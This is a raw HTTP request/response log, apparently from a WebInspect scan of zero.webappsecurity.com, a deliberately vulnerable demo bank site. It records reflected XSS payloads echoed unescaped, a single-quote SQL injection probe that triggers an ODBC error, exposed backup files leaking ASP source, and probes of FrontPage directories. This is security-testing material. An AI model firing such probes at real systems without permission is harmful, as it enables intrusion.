+ tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/link14/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:25 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:12 GMT ETag: "24dd20ffa9dc11:8f6" Content-Length: 39 <A HREF="./link15/index.htm">Link15</A>
GET /_vti_pvt/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_pvt/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /join.asp?name=1"style="background:url(javascript:alert('XSS'))"%20"&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:24 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /linking/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:18 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:08 GMT ETag: "a0aba6fca9dc11:8f6" Content-Length: 37 <A HREF="./link1/index.htm">Link1</A>
POST /login1.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 71 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect login='&password=333%2D333%2D3333test@test999.com&graphicOption=minimum
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:30 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 358 Content-Type: text/html Cache-control: private <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = ''''.</font> <p> <font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font>
GET /rootlogin.asp.old HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:35:03 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:20 GMT ETag: "5cb724c2a8dc11:8f6" Content-Length: 1351 <% dim sName, sPassPhrase sName=Request("txtName") sPassPhrase=Request("txtPassPhrase") %> <html> <body> <% if lcase(sName)="root" then Response.Write "Hello " & sName & "<br>Welcome back" elseif lcase(sName)="/etc/passwd" then Response.Write "root:x:0:0::/root:/bin/sh" Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false" Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false" Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false" Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false" Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false" Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false" elseif lcase(sName)="/boot.ini" then Response.Write "[boot loader]" Response.Write "timeout=30" Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT" Response.Write "[operating systems]" Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect" Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect" elseif lcase(sName)="*" then Response.Write "An error has occured" elseif lcase(sName)=";" then Response.Write "NON-HTML ERROR" else Response.Write "Go away " & sName & "<br>I don't know you" end if %> </body> </html>
GET /default.asp.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/error.html Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:35:38 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 05:45:35 GMT ETag: "481b288badc11:8f6" Content-Length: 37 <% response.redirect "login.asp" %>
GET /_private/.FBCIndex HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:50:23 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /login/login.asp?Action=Login&UserName=1"style="background:url(javascript:alert('XSS'))"%20"&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:53:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 374 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: 1"style="background:url(javascript:alert('XSS'))" "</h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>
GET /_vti_bin/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:33 GMT WWW-Authenticate: Negotiate WWW-Authenticate: NTLM Content-Length: 4431 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>You are not authorized to view this page</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li> <li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page.</li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <li>Background:<br> This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource. <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li> </p> </ul> </font></td> </tr> </table> </body> </html>
HEAD / HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Content-Type: text/plain
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 17:03:39 GMT X-Powered-By: ASP.NET Location: banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Keep-Alive Content-Length: 0 Content-Type: text/html Cache-control: private Set-Cookie: ASPSESSIONIDCQADCBSB=IPAAPGKBNLDFANIMOAOOHNCB; path=/
GET /login/login.asp?Action=Login&UserName=>"><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:53:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 355 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: >"><script>alert('XSS')</script></h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>
GET /join.asp?name=&email=1"style="background:url(javascript:alert('XSS'))"%20"&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:24 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> 